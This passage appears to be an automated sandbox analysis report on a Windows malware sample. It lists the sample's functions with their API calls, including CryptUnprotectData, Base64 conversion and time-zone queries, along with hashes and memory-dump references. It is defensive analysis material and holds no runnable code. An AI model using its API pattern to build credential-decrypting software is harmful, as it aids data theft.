                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: <7\h$huzx
                                      • API String ID: 0-2989614873
                                      • Opcode ID: aefaf097f79d00f3cb7cc583a99de9ca3f86213f6f2ab66147132978ee289807
                                      • Instruction ID: a9c64d120948b5159a66152b0db4714bd03a0a6dcc6f7f2fd615b28a992e811b
                                      • Opcode Fuzzy Hash: aefaf097f79d00f3cb7cc583a99de9ca3f86213f6f2ab66147132978ee289807
                                      • Instruction Fuzzy Hash: 2963357241EBD41ECB27CB3047B61A17F66BA13A10B1D49CEC8C18F5B3C794AA16E356
                                      Function 0057EA1E Relevance: 6.7, Strings: 4, Instructions: 1694COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: VwCg$kon?$x`-$U~r
                                      • API String ID: 0-2101599867
                                      • Opcode ID: d2b157370288e4a10cd22eb8f75e09b990090c400b0539a5ce01b176b1257a84
                                      • Instruction ID: 6f3e50f190328061da93ee19df2ea9c5e40f1aded48c1b09b1e968f9d6564100
                                      • Opcode Fuzzy Hash: d2b157370288e4a10cd22eb8f75e09b990090c400b0539a5ce01b176b1257a84
                                      • Instruction Fuzzy Hash: 95B2F7F3A0C2049FE3046E2DEC8567AFBE9EF94720F16493DEAC5D3744EA3558018696
                                      Function 00129030 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CryptBinaryToStringA.CRYPT32(00000000,001151D4,40000001,00000000,00000000,?,001151D4), ref: 00129050
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: BinaryCryptString
                                      • String ID:
                                      • API String ID: 80407269-0
                                      • Opcode ID: 9553eacfc06f38f6933bd24ebc89fe3a69a5f902e5330e3eb1113c6368f6e132
                                      • Instruction ID: aba897a04132377d99cf50fda2ea608b0c8343882ac781ab0cc05fee653c5ba7
                                      • Opcode Fuzzy Hash: 9553eacfc06f38f6933bd24ebc89fe3a69a5f902e5330e3eb1113c6368f6e132
                                      • Instruction Fuzzy Hash: 5F110670204218FFDF14CF58E894FAB33ADAF89310F108548FA198B250D772ED518BA8
                                      Function 0011A210 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00114F3E,00000000,00000000), ref: 0011A23F
                                      • LocalAlloc.KERNEL32(00000040,?,?,?,00114F3E,00000000,?), ref: 0011A251
                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00114F3E,00000000,00000000), ref: 0011A27A
                                      • LocalFree.KERNEL32(?,?,?,?,00114F3E,00000000,?), ref: 0011A28F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: BinaryCryptLocalString$AllocFree
                                      • String ID:
                                      • API String ID: 4291131564-0
                                      • Opcode ID: 4106d17a48b2c1a0bea45f984456b299707d06eed799f962e37c6def7db4325b
                                      • Instruction ID: b8a28a34805c9749ab690cb5b38292fdfc7efe2adf0f2c50de7854702de15c22
                                      • Opcode Fuzzy Hash: 4106d17a48b2c1a0bea45f984456b299707d06eed799f962e37c6def7db4325b
                                      • Instruction Fuzzy Hash: 2411C374641308AFEB15CF64CC95FAA77B9EB88B00F208558FA159F2D0D7B2A941CB50
                                      Function 00127B10 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00130DE8,00000000,?), ref: 00127B40
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00127B47
                                      • GetLocalTime.KERNEL32(?,?,?,?,?,00130DE8,00000000,?), ref: 00127B54
                                      • wsprintfA.USER32 ref: 00127B83
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateLocalProcessTimewsprintf
                                      • String ID:
                                      • API String ID: 377395780-0
                                      • Opcode ID: bdee9ea980dddc8f1abf4c8dac1f98baafd322274fad0b9d6621f81bf4c086c4
                                      • Instruction ID: 7d43a5305f4a447e9cbc40bdb4cd48e600b75d4ebdff7ce4d947456b7798b528
                                      • Opcode Fuzzy Hash: bdee9ea980dddc8f1abf4c8dac1f98baafd322274fad0b9d6621f81bf4c086c4
                                      • Instruction Fuzzy Hash: 32112AB2908158ABCB24DBC9ED85BBEB7BCFB4CB11F10461AF605A6280D3395940C7B0
                                      Function 00127BC0 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00E3F2D8,00000000,?,00130DF8,00000000,?,00000000,00000000), ref: 00127BF3
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00127BFA
                                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00E3F2D8,00000000,?,00130DF8,00000000,?,00000000,00000000,?), ref: 00127C0D
                                      • wsprintfA.USER32 ref: 00127C47
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                      • String ID:
                                      • API String ID: 3317088062-0
                                      • Opcode ID: c189482d6834c13b83aaaf8a44de5d8e4a939a018d6c376e09552fc64c2197e0
                                      • Instruction ID: dcc1c6ee795bb554c8b55f08a16b5ed8e1b95a69e12aa966fd76f176c09d6b7c
                                      • Opcode Fuzzy Hash: c189482d6834c13b83aaaf8a44de5d8e4a939a018d6c376e09552fc64c2197e0
                                      • Instruction Fuzzy Hash: 4811A1B1909229EBEB24CB64EC45FAAB77CFB44711F1007D5F619A72D0D7741A508B50
                                      Function 0057B4D6 Relevance: 5.4, Strings: 3, Instructions: 1641COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: -5_$AL%}$AP\O
                                      • API String ID: 0-55666361
                                      • Opcode ID: ded9e96bd11b011c06524acee7d560d2100644484d03c329991c500f20e65088
                                      • Instruction ID: 6e0ef2c23c258b68c6d2f1f1283d8f95b028a0f4ef42f37e4df819753efece44
                                      • Opcode Fuzzy Hash: ded9e96bd11b011c06524acee7d560d2100644484d03c329991c500f20e65088
                                      • Instruction Fuzzy Hash: B8B229F3A0C2049FE3046E2DEC8567AFBE9EF94620F1A453DEAC4C7744EA3558058697
                                      Function 0057D09D Relevance: 5.4, Strings: 3, Instructions: 1602COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: %-k$@0Wu$yUqi
                                      • API String ID: 0-1606714035
                                      • Opcode ID: ecc7c27bac0fd1f2bfa2ec5fed4d9afab595674e7cca8f93b721e66fb610041e
                                      • Instruction ID: 61247781b99e76d93c05c1d32fd480118d419d0e7dab10bb880dbb2c3e8b82ff
                                      • Opcode Fuzzy Hash: ecc7c27bac0fd1f2bfa2ec5fed4d9afab595674e7cca8f93b721e66fb610041e
                                      • Instruction Fuzzy Hash: B8B2FAF390C200AFE304AE2DDC8567AB7E9EF94720F1A893DE6C5C7744E63598418697
                                      Function 00123970 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CoCreateInstance.COMBASE(0012E120,00000000,00000001,0012E110,00000000), ref: 001239A8
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00123A00
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharCreateInstanceMultiWide
                                      • String ID:
                                      • API String ID: 123533781-0
                                      • Opcode ID: 10bfbd2a722824f43847dc9c22712b57cb19f6a93c89a4ef8fe209a0773fa1fd
                                      • Instruction ID: fd21155fc7d61d74356f0d4dd65c848be42e75e928700c089030e55da9e986b6
                                      • Opcode Fuzzy Hash: 10bfbd2a722824f43847dc9c22712b57cb19f6a93c89a4ef8fe209a0773fa1fd
                                      • Instruction Fuzzy Hash: 7741E870A40A289FDB24DB58DC95F9BB7B5BB48702F4042D8E618EB2D0D7B16E85CF50
                                      Function 0011A2B0 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0011A2D4
                                      • LocalAlloc.KERNEL32(00000040,00000000), ref: 0011A2F3
                                      • LocalFree.KERNEL32(?), ref: 0011A323
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Local$AllocCryptDataFreeUnprotect
                                      • String ID:
                                      • API String ID: 2068576380-0
                                      • Opcode ID: b6e1d09923d85d9a5ef1dd3f34bcc361425c46d6c6906b4de8f1888b4a252951
                                      • Instruction ID: 2e9786161c10b5949d28e92842d4a687bfb2beefff963b7f29113b3b9ef62202
                                      • Opcode Fuzzy Hash: b6e1d09923d85d9a5ef1dd3f34bcc361425c46d6c6906b4de8f1888b4a252951
                                      • Instruction Fuzzy Hash: 4C11A8B8A01209DFCB05DFA4D985AAEB7B9FF89300F108569ED159B390D770AE50CB61
                                      Function 00184BA8 Relevance: 3.4, Strings: 2, Instructions: 941COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: ?$__ZN
                                      • API String ID: 0-1427190319
                                      • Opcode ID: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                      • Instruction ID: f3ba539fe077b31e5a4df7bd8ca550ccd915738790bc07074739c9fd6320cf08
                                      • Opcode Fuzzy Hash: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                      • Instruction Fuzzy Hash: CA722272908B118BD718DF18C89066ABBE3FFD5310F698A1DF8A55B291D770DE418F82
                                      Function 00165DB9 Relevance: 2.5, Strings: 1, Instructions: 1234COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
